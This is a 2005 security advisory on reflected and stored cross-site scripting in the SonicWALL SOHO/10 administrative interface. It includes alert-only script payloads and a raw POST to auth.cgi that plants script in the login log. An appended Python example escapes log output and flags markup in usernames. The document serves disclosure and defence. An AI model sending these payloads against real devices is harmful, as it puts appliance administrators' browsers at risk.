sonicwallXSS.txt

Date: 17 Apr 2005 00:00:00
Reported by: Oliver Karow
Type: packetstorm
Source: packetstormsecurity.com

SonicWALL SOHO/10 XSS and code injection vulnerability in the webroot, allowing script execution in the user's browser environment and via the system logfile; affects firmware version 5.1.7.0

`SonicWALL SOHO/10 - XSS and Code Injection vulnerability  
========================================================  
  
Product:  
========  
  
SonicWall SOHO/10 is the 2nd generation Internet Security Appliance from  
SonicWall, with firewall, VPN, content-filtering and other capabilities.  
  
  
Vulnerability:  
==============  
  
There is a cross-site scripting vulnerability in the webroot.  
Script code contained in an HTTP GET request will be executed  
in the web browser environment of the user:  
  
  
http://192.168.168.168/<script>alert("Its not magic... its a  
sonic")</script>  
  
  
There is a second vulnerability, which I consider as something between an XSS  
and a code-injection vulnerability,  
because the user does not have to follow an HTML link to run into the  
attack:  
  
If an attacker supplies a username containing script code at the login page  
of the device, an entry containing that "username" is written to the  
system logfile.  
  
The system logfile is displayed in HTML format. When the appliance admin  
views the logfile, the script code  
will be executed.  
  
Because the length of the input field is limited by the browser (client side), you  
can insert a short script  
into the username field to quickly verify the existence of the  
vulnerability:  
  
</TD><script>alert("!")</script>  
  
To supply longer scripts, you have to modify the request, e.g. with a proxy,  
or simply send a modified  
POST request via netcat:  
  
  
POST http://192.168.168.168:80/auth.cgi HTTP/1.0  
Accept: */*  
Referer: http://192.168.168.168/auth.html  
Accept-Language: de  
Content-Type: application/x-www-form-urlencoded  
Proxy-Connection: Keep-Alive  
User-Agent: BadGuy  
Host: 192.168.168.168  
Content-Length: 160  
Pragma: no-cache  
  
uName=</TD><script>alert("Its not magic... its a  
sonic")</script>&pass=NiceTry&Submit=Login&clientHash=bbe63bb858b02e741d2d12023ee350a1  
  
  
  
Version:  
========  
  
I only tested the following version:  
  
SonicWall SOHO/10  
Firmware: 5.1.7.0  
ROM-Version: 4.0.0  
  
Other versions may also be affected.  
  
Vendor:  
=======  
  
Website: http://www.sonicwall.com  
Status: informed  
  
Discovered by:  
==============  
  
Oliver Karow  
Date: 29.03.2005  
Website: http://www.oliverkarow.de/research/sonicwall.txt  
  
`
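The log-view defect the advisory describes, as an added example that is not the appliance's code nor the author's: a hypothetical HTML log table rendered with and without output escaping, plus a log-review check that flags login names containing markup. The request body, the table layout and the log-line format are all constructed assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed request body in the shape of the advisory's POST to auth.cgi,
# URL-encoded as a browser would send it (the uName field carries the payload).
SAMPLE_BODY = (
    "uName=%3C%2FTD%3E%3Cscript%3Ealert%28%22%21%22%29%3C%2Fscript%3E"
    "&pass=NiceTry&Submit=Login"
)

def username_from_body(body: str) -> str:
    """Decode the uName field the way a login handler would see it."""
    return parse_qs(body).get("uName", [""])[0]

def vulnerable_log_row(username: str) -> str:
    """Unsafe log view (hypothetical layout): the logged username is pasted
    into the HTML table verbatim, so a name starting with '</TD>' closes the
    cell and the following <script> runs in the admin's browser."""
    return f"<TR><TD>Login failed</TD><TD>{username}</TD></TR>"

def safe_log_row(username: str) -> str:
    """Hardened log view: escape at the HTML output boundary, so the same
    logged string is displayed as text and never leaves its cell."""
    return f"<TR><TD>Login failed</TD><TD>{html.escape(username, quote=True)}</TD></TR>"

# Anything that looks like an HTML tag has no business in a login name.
MARKUP = re.compile(r"<\s*/?\s*[A-Za-z]")

def is_suspicious_username(username: str) -> bool:
    return bool(MARKUP.search(username))

# Constructed log lines (the format is assumed, not the appliance's real one).
SAMPLE_LOG = [
    "2005-03-29 10:01:12 Login failed user=admin src=10.0.0.5",
    '2005-03-29 10:01:40 Login failed user=</TD><script>alert("!")</script> src=10.0.0.9',
]

def flagged_entries(lines):
    """Log-review check: return the entries whose username carries markup."""
    hits = []
    for line in lines:
        m = re.search(r"user=(.*?) src=", line)
        if m and is_suspicious_username(m.group(1)):
            hits.append(line)
    return hits
```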
